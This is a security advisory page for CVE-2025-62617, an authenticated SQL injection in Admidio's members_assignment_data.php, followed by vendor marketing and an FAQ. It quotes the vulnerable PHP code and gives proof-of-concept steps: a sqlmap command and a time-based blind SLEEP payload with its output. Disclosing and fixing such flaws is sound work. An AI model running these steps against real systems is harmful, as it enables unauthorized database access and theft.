Summary
An authenticated SQL injection vulnerability exists in the member assignment data retrieval functionality of Admidio. Any authenticated user with permissions to assign members to a role (such as an administrator) can exploit this vulnerability to execute arbitrary SQL commands. This can lead to a full compromise of the application's database, including reading, modifying, or deleting all data. The vulnerability is present in the latest version, 4.3.16.
Details
The vulnerability is located in the adm_program/modules/groups-roles/members_assignment_data.php script. This script handles an AJAX request to fetch a list of users for role assignment. The filter_rol_uuid GET parameter is not properly sanitized before being used in a raw SQL query.
File: adm_program/modules/groups-roles/members_assignment_data.php
// ...
// The parameter is retrieved from the GET request without sufficient sanitization for SQL context.
$getFilterRoleUuid = admFuncVariableIsValid($_GET, 'filter_rol_uuid', 'string');
$getMembersShowAll = admFuncVariableIsValid($_GET, 'mem_show_all', 'bool', array('defaultValue' => false));
// ...
$filterRoleCondition = '';
if ($getMembersShowAll) {
$getFilterRoleUuid = 0;
} else {
// show only members of current organization
if ($getFilterRoleUuid !== '') {
// VULNERABLE CODE: $getFilterRoleUuid is directly concatenated into the query string.
$filterRoleCondition = ' AND rol_uuid = \''.$getFilterRoleUuid . '\'';
}
}
// ...
// The vulnerable $filterRoleCondition is then used inside a subselect.
$sqlSubSelect = '(SELECT COUNT(*) AS count_this
FROM '.TBL_MEMBERS.'
INNER JOIN '.TBL_ROLES.'
ON rol_id = mem_rol_id
INNER JOIN '.TBL_CATEGORIES.'
ON cat_id = rol_cat_id
WHERE mem_usr_id = usr_id
AND mem_begin <= \''.DATE_NOW.'\'
AND mem_end > \''.DATE_NOW.'\'
'.$filterRoleCondition.'
AND rol_valid = true
AND cat_name_intern <> \'EVENTS\'
AND cat_org_id = '.$gCurrentOrgId.')';
// ...
As shown above, the value of $getFilterRoleUuid is directly concatenated into the $filterRoleCondition variable, which is then embedded within a larger SQL query ($sqlSubSelect). This allows an attacker to break out of the string literal and inject arbitrary SQL commands.
PoC (Proof of Concept)
Prerequisites:
- A running instance of Admidio (tested on version 4.3.16).
- An authenticated user session with permissions to assign members to a role (e.g., the default 'admin' user).
Execution:
The vulnerability can be triggered by manipulating the filter_rol_uuid parameter in the request to /adm_program/modules/groups-roles/members_assignment_data.php. Due to the large number of parameters, the easiest way to reproduce this is by capturing a legitimate request and replaying it with sqlmap.
- Log in to Admidio as an administrator.
- Navigate to
Groups / Roles. - Click the "Assign members" icon for any existing role.
- Using a web proxy like Burp Suite, intercept the GET request made to
/adm_program/modules/groups-roles/members_assignment_data.php. - Save the entire raw request to a text file (e.g.,
admidio_request.txt). - Run the following
sqlmapcommand to confirm the time-based blind SQL injection:
sqlmap -r /path/to/admidio_request.txt -p filter_rol_uuid --technique=T --dbms=mysql --current-db
Result:sqlmap will successfully identify and exploit the time-based blind SQL injection vulnerability.
---
Parameter: filter_rol_uuid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: role_uuid=...&filter_rol_uuid=' AND (SELECT 3332 FROM (SELECT(SLEEP(5)))vqnl) AND 'ENdG'='ENdG&...
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[INFO] fetching current database
[INFO] retrieved: admidio
current database: 'admidio'
This confirms that an attacker can execute arbitrary SQL queries and extract information from the database.
Impact
Untrusted input alters a database query, allowing the attacker to read or modify data the query was not intended to access. Typical impact: data disclosure or modification.
CVE-2025-62617 has a CVSS score of 7.2 (High). The vector is network-reachable, high privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (4.3.17); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2025-62617? CVE-2025-62617 is a high-severity SQL injection vulnerability in admidio/admidio (composer), affecting versions <= 4.3.16. It is fixed in 4.3.17. Untrusted input alters a database query, allowing the attacker to read or modify data the query was not intended to access.
- How severe is CVE-2025-62617? CVE-2025-62617 has a CVSS score of 7.2 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of admidio/admidio are affected by CVE-2025-62617? admidio/admidio (composer) versions <= 4.3.16 is affected.
- Is there a fix for CVE-2025-62617? Yes. CVE-2025-62617 is fixed in 4.3.17. Upgrade to this version or later.
- Is CVE-2025-62617 exploitable, and should I be worried? Whether CVE-2025-62617 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2025-62617 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2025-62617? Upgrade
admidio/admidioto 4.3.17 or later.